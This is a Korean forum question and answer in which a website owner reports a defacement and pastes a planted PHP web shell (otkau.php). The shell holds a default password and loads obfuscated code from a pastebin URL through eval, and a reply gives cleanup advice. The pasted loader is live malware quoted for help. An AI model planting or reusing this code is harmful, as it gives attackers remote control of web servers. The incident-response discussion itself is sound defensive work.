해킹 관련 문의
본문
네 방금전 해킹으로 메인페이지가 변경되었네요...
DATA 폴더와 인덱스 폴더에 아래와 같은 otkau.php 파일이 생성되었고
<?php
/*
Web Shell by AnoaGhost
*/
@ini_set('output_buffering',0);
@ini_set('display_errors', 0);
$auth_pass = "c3240bced4d9afdcdcb375fbdde8f3ad"; // Default pass is : tenshi
$anoakuroi = file_get_contents('http://pastebin.com/raw/0yNDCBng');
eval(str_rot13(gzinflate(base64_decode(($anoakuroi)))));
?>
메인페이지가 바뀌어 있네요...
딱히 어떻게 해야할지 감이 안와서
이런 경우 어떻게 해야하는지 문의 좀 드립니다.
답변 1
글쓰기시 파일첨부 기능을 이용해 웹셀파일을 올렸을텐데 이상한데요,
첨부파일을 올리면 write_update.php 494라인쯤 확장자가 php 등과 같은 파일은 확장자가 변경되어 저장되기 때문에 바로 실행이 불가할텐데요.
일단 그 파일이 언제 생성되었는지 확인후 해당 파일 삭제하시고 생성된 일시로 ip확인후 차단하는게
좋을 듯 싶군요.
ftp,mysql 비밀번호 변경하시는 것도 한 방법이겠습니다.
답변을 작성하시기 전에 로그인 해주세요.